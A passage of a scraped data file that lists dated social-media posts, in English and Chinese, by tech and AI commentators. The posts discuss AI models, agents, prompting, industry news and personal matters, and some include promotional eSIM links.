other people use the now dominant Chinese ecosystem and your NVIDIA retirement shares lose money.\n\nWhen you can't use open source anymore because it gets banned for Americans, you can thank these short-sighted, foolish folks.\n\nWhen your API bills is a billion dollars and burns your budget in three months instead of 12, you can thank these folks.\n\nWhen all your personal intimate, personal data flows threw a few tight gateways and choke points mandated by law, you can thank these folks.", + "url": "https://x.com/ylecun/status/2050162348891979817", + "published_at": "2026-05-01T10:36:08+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2050157073883902069", + "published_at": "2026-05-01T10:15:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Co-sign.", + "url": "https://x.com/pmarca/status/2050155852460675379", + "published_at": "2026-05-01T10:10:19+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "GPT 5.5 可以通过设定目标和指标\n\n自行迭代优化🔁", + "url": "https://x.com/GoSailGlobal/status/2050154742480040440", + "published_at": "2026-05-01T10:05:55+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. \n\nI would recommend any company spending 100k+ a year on AI to purchase 8-10~ 6000s and have a few of the works to have them blind test these models for work.", + "url": "https://x.com/CuiMao/status/2050145968553709999", + "published_at": "2026-05-01T09:31:03+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: A great summary of the 21st century so far", + "url": "https://x.com/pmarca/status/2050143545525211213", + "published_at": "2026-05-01T09:21:25+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "那些餐饮店的饮料还以为是做慈善\n原来进货价就1毛钱一瓶水实测可以买很多瓶\n自己有多少个号买多少个号,应该不是敌敌畏\n0.1🉐百花蜂蜜500g\nhttps://u.jd.com/fOY2tiP\n0.1🉐弱碱苏打水300ml*1瓶\nhttps://u.jd.com/fgYnQ2p\n0.1🉐金银花罗汉果茶360ml*1瓶\nhttps://u.jd.com/fOYTQzZ\n0.1🉐百合绿豆水400ml*1瓶\nhttps://u.jd.com/f6YpRFx", + "url": "https://x.com/realNyarime/status/2050142432088526883", + "published_at": "2026-05-01T09:17:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "北京环球影城!✌️", + "url": "https://x.com/CuiMao/status/2050142119604691422", + "published_at": "2026-05-01T09:15:45+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个音频组件库做得太完美了。\n\nhttps://audio.raphaelsalaja.com/", + "url": "https://x.com/dingyi/status/2050137408268886450", + "published_at": "2026-05-01T08:57:02+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "从昨天开始有不少网友反馈iOS推送异常,原因未知\n在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败\n\n这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS", + "url": "https://x.com/realNyarime/status/2050136980454031800", + "published_at": "2026-05-01T08:55:20+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "On Project Fear.", + "url": "https://x.com/pmarca/status/2050135501550883051", + "published_at": "2026-05-01T08:49:27+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "…", + "url": "https://x.com/pmarca/status/2050135309053276499", + "published_at": "2026-05-01T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "…", + "url": "https://x.com/pmarca/status/2050134937396007224", + "published_at": "2026-05-01T08:47:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending.", + "url": "https://x.com/pmarca/status/2050132661348561361", + "published_at": "2026-05-01T08:38:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.", + "url": "https://x.com/pmarca/status/2050131426499301840", + "published_at": "2026-05-01T08:33:16+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "“Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston Strangler is to the woman home alone.’”", + "url": "https://x.com/pmarca/status/2050131011095404902", + "published_at": "2026-05-01T08:31:37+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "贵州牛肉粉 3u", + "url": "https://x.com/0xAA_Science/status/2050129079677145442", + "published_at": "2026-05-01T08:23:56+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。\n\n@theo 做了个最干净的实验:\n建一个空 Git 仓库,commit 只放一行 JSON:\n\n{\"schema\": \"openclaw.inbound_meta.v1\"}\n\n调用官方 Claude Code —— 直接报错\"out of extra usage\"。\n要么拒绝请求,要么强制多收一份钱。\n\n0 行业务代码,只因为那一行 JSON 里有 OpenClaw 这个单词。\n\n模型在卷开源,工具会不会开始卷封闭?", + "url": "https://x.com/runes_leo/status/2050127414630469937", + "published_at": "2026-05-01T08:17:19+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The same will be true of “because of AI”.", + "url": "https://x.com/pmarca/status/2050127365930729486", + "published_at": "2026-05-01T08:17:08+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2050127137898922384", + "published_at": "2026-05-01T08:16:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.", + "url": "https://x.com/pmarca/status/2050126879982805379", + "published_at": "2026-05-01T08:15:12+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050123904849699053", + "published_at": "2026-05-01T08:03:23+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "R to @pmarca: Credit @qorprate", + "url": "https://x.com/pmarca/status/2050123454373048716", + "published_at": "2026-05-01T08:01:35+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "And yet we write.", + "url": "https://x.com/pmarca/status/2050122286603321365", + "published_at": "2026-05-01T07:56:57+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Spotify真的挺有意思的\n\n为人类艺术家打上了“验证”标签\n\n是不是太多AI生成了。\n\n看来AI Generate的标识已经打不过来,甚至分辨不出来了", + "url": "https://x.com/GoSailGlobal/status/2050121466021363878", + "published_at": "2026-05-01T07:53:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050120872309264725", + "published_at": "2026-05-01T07:51:20+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050120321399951771", + "published_at": "2026-05-01T07:49:08+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "OpenAI 要分家了\n\n山姆(Sam)醉酒发推\n\nGitHub 要完蛋了\n\nAnthropic 还是老样子\n\n播客也挺难的,支持一下", + "url": "https://x.com/GoSailGlobal/status/2050120304203317373", + "published_at": "2026-05-01T07:49:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格\n\nhttps://getdesign.md", + "url": "https://x.com/bozhou_ai/status/2050119556644171998", + "published_at": "2026-05-01T07:46:06+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。\n\n这份指南的思路挺有意思。以前大家写 Prompt 的习惯是\"手把手教\":先做A,再做B,然后比较C。\n\n现在 OpenAI 官方的建议是:描述终点,而不是规定路线。\n\n几个值得注意的点:\n\n1. Outcome-First(结果导向):\n\n不要写一堆步骤让模型按顺序执行,而是描述\"成功是什么样的\",让模型自己决定怎么走。翻译成人话:以前是写\nSOP,现在是写验收标准。\n\n2. 停止条件(Stopping Conditions):\n\n给模型加一个明确的\"能不能回答了?\"的判断规则,防止它无限循环地查资料、做推理。这个在 Agent\n场景下尤其重要——很多 Agent 跑飞了就是因为没有好的停止条件。\n\n3. 自我检查(Self-Checking):\n\n写完代码跑测试、做完 UI 截图看一眼、做计划要可追溯。这不就是软件工程的基本功吗?\n\n4. 搜索预算(Grounding):\n\n给模型设定搜索的\"停止规则\"——搜到能回答问题的信息就停,别为了润色措辞再去搜一轮。\n\n5. 创意内容和事实分开:\n\n检索到的事实用来支撑具体的数据和声明,创意部分不要编造具体数字和指标。\n\n这份指南还提到了一个 text.verbosity 参数,可以控制输出的详细程度,默认是 medium,设成 low 可以让输出更简洁。做 API 开发的可以关注一下。\n\n说说我的看法:\n\n这份指南看着在讲 Prompt 技巧,底下的逻辑其实是 Harness Engineering。停止条件、验证循环、搜索预算,这些都不是 Prompt本身的问题,而是围绕模型的工程系统设计。\n\n另一个有意思的转变:\n以前写 Prompt 像写代码,要精确控制每一步;现在更像写需求文档,描述清楚\"要什么\"和\"什么算完成\"就行。这和 Agentic Engineering的大方向是一致的——你不需要控制 Agent 的每一步,而是设定好目标和边界。\n\n不过有一点要注意:这份指南是针对 GPT-5.5 的。不同模型对 Prompt 风格的偏好不一样,Claude 和 GPT 在这方面会有明显差异。", + "url": "https://x.com/Pluvio9yte/status/2050118179062743418", + "published_at": "2026-05-01T07:40:37+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。\n\n推荐一下插件和自动化,很上头。", + "url": "https://x.com/frxiaobei/status/2050116811769954778", + "published_at": "2026-05-01T07:35:11+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md\n\nhttps://styles.refero.design/", + "url": "https://x.com/dingyi/status/2050109458957947150", + "published_at": "2026-05-01T07:05:58+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "小米之家河南限定五一礼物钧瓷已拿到\n还送了水和王者明信片,汝窑会更好看,天青色\n\n对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷\n不知道为啥换名字了\n\n青花瓷是靛蓝或者宝石蓝,不是天青色", + "url": "https://x.com/realNyarime/status/2050108592246984780", + "published_at": "2026-05-01T07:02:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "跟推友问好👋\n\n有一个问题想问大家🙋\n\n放假都没出去,看了一圈好像没什么好玩的地方🤔\n\n所以想问问,有什么值得两人旅行的地方?😳", + "url": "https://x.com/realNyarime/status/2050101082433720730", + "published_at": "2026-05-01T06:32:41+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。\n\n1. Software 3.0 来了。\n1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。\n\n2. 2025-12 是拐点。\n生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。\n\n3. 神经网络会成主计算层。\n未来不是 CPU 上跑神经网络,是神经网络当主进程,传统计算变辅助。\n\n4. 许多应用会消失。\n用户不需应用,直接拿模型输出。MenuGen 那种轻量工具最先被替代。\n\n5. 验证性决定进展速度。\n数学、代码这种可结算的领域 AI 飞快。模糊任务仍是\"锯齿智能\"。\n\n6. 新的 10x 工程师不是会写代码的人。\n是会做这五件事的人——\n\n规范 / 监督 / 审查 / 评估 / 权限管理。\n\n没一件是写代码本身。\n\n7. 它们是鬼,不是动物。\nLLM 是统计模拟物,盲信和盲拒都不对,要实证理解它的边界。\n\n最强金句:\n\n> 你可以外包思考。\n> 但不能外包理解。\n\n---\n\n跑了半年策略,第 6 条最有体感。\n\n写新策略丢 prompt 给 Claude Code 就有了。\n真正花时间的是规范怎么写、跑出来怎么审、上线前权限怎么收。\n\n代码量从 0 到 1 的那段不再是瓶颈。\n从 1 到能信任的那段才是。\n\n---\n\n鬼,不是动物。\n盲信和盲拒都不对。", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "published_at": "2026-05-01T06:14:26+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "硅谷101 这期 DeepSeek,我反复看了 3 遍\n\n陈茜也转发了我的推文\n\n3 个细节没人注意到,但对我们做出海/独立开发的影响最大:\n\n1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+\n\n出海产品从来不是\"等团队够大\",是\"敢做\"\n\n我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗\n\n2️⃣ 幻方 7 年量化背景,把\"模型上线 → A/B → 不行就删\"做成了肌肉记忆\n\n3 周一次大版本,迭代速度是 OpenAI 的 3 倍\n\n独立开发者天然就该这么干,但 90% 的人在第 2 周就开始打磨 UI 细节,全错\n\n3️⃣ 梁文锋几乎 0 媒体露面、0 KOL 投放\n\n靠的是产品 → 用户口碑 → X 自传播\n\n我基本每天起码保持日更,维持手感,\"做不出爆款是因为没渠道\" 是骗自己", + "url": "https://x.com/GoSailGlobal/status/2050092401004564952", + "published_at": "2026-05-01T05:58:11+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了", + "url": "https://x.com/bozhou_ai/status/2050092103565496369", + "published_at": "2026-05-01T05:57:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "避雷一下中国电信英国(CTExcel UK)\n虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制\n头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣", + "url": "https://x.com/realNyarime/status/2050088491925815667", + "published_at": "2026-05-01T05:42:39+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks", + "url": "https://x.com/paulg/status/2050084092402688337", + "published_at": "2026-05-01T05:25:11+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974561199…", + "url": "https://x.com/GoSailGlobal/status/2050076357296824737", + "published_at": "2026-05-01T04:54:26+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "今天看了 @GabiExplores 的两个项目:\n\nstitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台\n\nslopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测论文\n\n工程量:扎实。GitHub stars 加起来 24,X 关注 4。\n\n同期对比:obra/superpowers 173K,garrytan/gstack 86K,mattpocock 42K。\n\n差 1700-7000 倍。差距不是质量,是 distribution。\n\n蓝皮书 Ch3 「shipping easy, distribution hard」每天都在被印证:https://github.com/zhuyansen/skill-blue-book/blob/main/part1-foundation/ch03-market-landscape.md\n\n🔗 http://github.com/gabelul/stitch-kit\n🔗 http://github.com/gabelul/slopbuster", + "url": "https://x.com/GoSailGlobal/status/2050075607707586658", + "published_at": "2026-05-01T04:51:28+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。\n\n简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。\n\n这个观点我是认同的。说说自己的体验:\n\n1. 以前写一篇翻译稿,光是在浏览器、编辑器、翻译工具之间来回切换就要耗掉不少精力。现在直接在 Claude Code 里一条龙搞定,中间那些摩擦几乎消失了。\n2. 以前整理一个项目的技术文档,要打开十几个文件逐个看。现在让 Agent 自己去读代码、生成文档,我只负责审核。\n\n这些不是什么\"颠覆性\"的变化,但每天确实能省出不少心流时间。\n\n不过有一点要注意:Altman 说\"大多数人可以放松下来看着 AI完成枯燥工作\",这个对程序员和重度工具用户来说已经在发生了,但对很多传统行业的人来说,光是\"怎么把工作交给 AI\"这件事本身就是一个不小的学习成本。\n\n翻译成人话:不是 AI 不够强,是大多数人的工作流还没有为 AI 准备好。这其实就是 Harness的问题——模型能力到了,但围绕模型的工作环境(工具链、权限、数据接入)还没跟上。\n\n所以 Altman 这个判断方向是对的,但真正落地可能比他说的要慢一些。至少目前,能真正享受到\"心流不被打断\"的,还是少数已经把 AI 深度嵌入工作流的人。", + "url": "https://x.com/Pluvio9yte/status/2050072657618772226", + "published_at": "2026-05-01T04:39:44+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "我艹!这一波Codex+GPT2 真是成了!\n直接可以来开发游戏了,而且只是用嘴!\n\n一句话就可以搞起来,完整教程看藏师傅的教程👇", + "url": "https://x.com/berryxia/status/2050070823256654283", + "published_at": "2026-05-01T04:32:27+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "假新闻、任何虚假的东西,总是能获得更多关注。这对吗?", + "url": "https://x.com/dingyi/status/2050065962855182350", + "published_at": "2026-05-01T04:13:08+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯\n\n不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。\n\n结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30%,剩下大部分也拿下。Genentech和Roche自己跑的CompBioBench也印证了,Claude Opus 4.6整体准确率冲到81%……\n\n这已经不是“助手”了,这是真正的科研force multiplier,甚至开始在最硬核的问题上把人类专家甩开。\n\n它是怎么做到的?通过跨海量论文的知识储备 + 多重分析策略并行,相当于把一屋子顶尖专家的脑力一次性打包输出。\n\n这波操作意味着生物医药研究的范式要变天了。未来突破的节奏会大幅加速,研究者可能更多转向hypothesis curation、品味判断和实验设计,而AI来扛heavy lifting的data crunching和pattern finding。\n\n最关键的护城河,变成了你能不能设计出高效的人机协同agent系统,能不能在AI的锯齿智能里守住人类独有的那点“taste”", + "url": "https://x.com/Pluvio9yte/status/2050063821377810451", + "published_at": "2026-05-01T04:04:38+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯\n\n他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。\n\nKarpathy说了三个阶段:\nSoftware 1.0:你写显式规则\nSoftware 2.0:你调数据+训练网络\nSoftware 3.0:你给 Context + Prompt,让 LLM 自己去当那个智能解释器\n\n举两个他亲身实验的狠例子:\nOpenClaw 安装:以前是写一堆复杂 shell script 去适配各种平台。现在?直接扔一句 prompt 给 agent,它自己看环境、debug、搞定全部。你编程的对象从“代码”变成了“一段描述”。\n\nMenu Gen:以前他还老老实实写 Vercel App、OCR、调用图像生成器……结果 Gemini 直接吃照片、用 prompt 就把菜单重绘+图片叠加上去了。整个 App 都没必要存在了!\n\n他还区分了两个词:\nVibe Coding:把地板拉高,所有人都能随便搞东西,太爽了\nAgentic Engineering:把天花板继续拔高,专业软件的质量不能因为“vibe”而掉,你得学会 harness 这些技能,让它们又快又稳\n\nAI 加快了技术平权,编程从职业开始变成每个人都能拥有的超级能力。", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "published_at": "2026-05-01T03:47:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Customer service in the age of AI has been become truly horrible. Excruciatingly bad.", + "url": "https://x.com/GaryMarcus/status/2050058685531983988", + "published_at": "2026-05-01T03:44:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t let me change delivery options, and I literally cannot reach a human. \n\nYou have simply held an important package without delivering it or giving me any recourse. You might as well have stolen it.\n\nF-. \n\nSecond time in two weeks, this time worse than first.", + "url": "https://x.com/GaryMarcus/status/2050057004862103767", + "published_at": "2026-05-01T03:37:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这种平台有点意思,也见过好几个同类型的了。\n互动加热的平台其实很大程度上依赖宣传和用户自传播。\n见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样", + "url": "https://x.com/Pluvio9yte/status/2050053813802090671", + "published_at": "2026-05-01T03:24:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "Computer plays the orchestra", + "url": "https://x.com/AravSrinivas/status/2050053128452456584", + "published_at": "2026-05-01T03:22:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs.\n\nSo the question becomes what is the business model of software and this headless approach in the future?\n\nHere are a few thoughts on how everything plays out based on what we’re seeing and doing at Box, but also conversation with other platforms.\n\n1) Seats don’t go away for *people*. Seats are still a convenient and efficient way to have a customer use technology predictably for a set of users within a baseline set of usage. The key, though, is that when the customer pays for a seat, it has to come with a set of usage of APIs on behalf of that user that the agent can use on their behalf. \n\nThe user will need to be able to interact with their data and the underlying tool via any agent they work with, and an embedded amount of usage will come with the seat. I would imagine most software -Box included- will enable seats to work with their data at a relatively high volume via systems like ChatGPT, Codex, Claude, Gemini, Cursor, Copilot, Perplexity, Factory, Cogniton, et al. quite seamlessly. If you don’t do this, you’re DOA.\n\n2) Agents may have “seats” if they are doing stateful work in the system, but they will be priced very differently than people. Seats (or the equivalent) can make sense when you have an agent that has its own workspace, stores its own data, needs a different set of permissions compared to the user, and so on. \n\nIf a company wants this agent to be around for long period of time, that may very well look like another “user” in the system. Openclaw-style agents highlight what this future could look like. \n\nThe only issue on pricing here is that one customer could decide to do all their work in 1 agent, and another might split it into 1,000 agents. So pricing like a human seat is nearly impossible and impractical; each company will have a different approach for this as it gets tricky perfectly trying to capture all the value within an agent seat.\n\n3) The dominant pricing for headless use that goes above the seat allotment, or when an agent is firmly acting on their own, will be a consumption model. Many enterprises software platforms have previously operated like this with PaaS options, and agents will look like another machine user of their system. \n\nIn some cases the APIs might get priced just as they did previously, but in other cases there may need to be new types of APIs that represent the work an agent would do in one go -more akin to an outcome- instead of a series of API calls. This is especially germane when the headless software also has an agentic use-case embedded within in, such as orchestrating the process within their own system via AI.\n\nOverall the growth of this usage pattern is effectively unbounded as the use-cases for agents operating on data in these systems will dramatically exceed what people do with their data and tools today. Every platform that goes headless (which will be anyone that wants to take advantage of agents) will need to adopt a model like this. Some may fight it initially but it’s an inevitably as there will always be more and more agents outside your platform than people.\n\nOverall, there’s a lot of really interesting changes left to come in software due to headless use of these systems. Early days.", + "url": "https://x.com/paulg/status/2050051426446152159", + "published_at": "2026-05-01T03:15:22+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.", + "url": "https://x.com/GaryMarcus/status/2050050604915888484", + "published_at": "2026-05-01T03:12:06+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "🤔赚钱 -> 美股,长持复利\n\n2月开始关注上英特尔的,后面又加仓\n\n陈立武真是英特尔的福星", + "url": "https://x.com/GoSailGlobal/status/2050049784094855501", + "published_at": "2026-05-01T03:08:51+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "Video", + "url": "https://x.com/AravSrinivas/status/2050048790908785072", + "published_at": "2026-05-01T03:04:54+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "至于说eSIM太贵,如果愿意折腾也可以省钱。分享一期中国大陆5天无限流量(每天5G高速)仅需25THB约5.24CNY\n先领取优惠👇🏻\nhttps://s.ee/superalink\n再购买中国大陆套餐👇🏻\nhttps://s.ee/superalinkcn\n这里需要右上角改成THB(泰铢),语言还是保持中文。确定支付金额是否为:25泰铢,约5.24CNY,如果你发现价格不对,请回到第一个链接领取优惠\n\n确保兼容性,点击:开启,输入优惠码:输入NYARI0001(默认会显示),输入你的邮箱,用于接收eSIM二维码,选择支付方式,点击:立即支付。打开邮件,用支持eSIM设备或手机扫描这个二维码即可把eSIM添加到手机,每个号一次,就是需要一周换一次达量限速\n如果你的手机不支持eSIM,也可以买一张eSTK,使用优惠码naixi可以打9折👇🏻\nhttps://s.ee/estk\n\n作为主推eSIM的小博主,我承认外卡并不安全,尤其是串号(IMEI)锁定使用者,以及GTP协议明文传输\n显然境外电话卡只是帮你回源到原运营商,协助你出GFW,要想流量不被看出来那就得套VPN\n\n比如买一张香港出口的eSIM,在这基础上叠加CF WARP、iCloud Privacy Relay、VPN Gate等VPN,多损失10%的流量用于加密。你会发现TopCashback买的返120%的NordVPN、Surfshark VPN都能用了,这是因为你漫游回境外,就跟出国使用VPN无异(在国外,VPN一般用于流媒体解锁,如在MY看SG的网飞", + "url": "https://x.com/realNyarime/status/2050047591191384162", + "published_at": "2026-05-01T03:00:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Get @WisprFlow and the @elgato foot pedal — it’s life changing", + "url": "https://x.com/jason/status/2050042395111088463", + "published_at": "2026-05-01T02:39:29+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "老奶奶 vibe 大法果然好用。", + "url": "https://x.com/dingyi/status/2050035236487172404", + "published_at": "2026-05-01T02:11:02+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "artificial goblin intelligence\n\nachieved", + "url": "https://x.com/sama/status/2050021650641695108", + "published_at": "2026-05-01T01:17:03+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?", + "url": "https://x.com/GaryMarcus/status/2050020685733564459", + "published_at": "2026-05-01T01:13:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Most evil person in AI", + "url": "https://x.com/GaryMarcus/status/2050020164612104604", + "published_at": "2026-05-01T01:11:09+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + 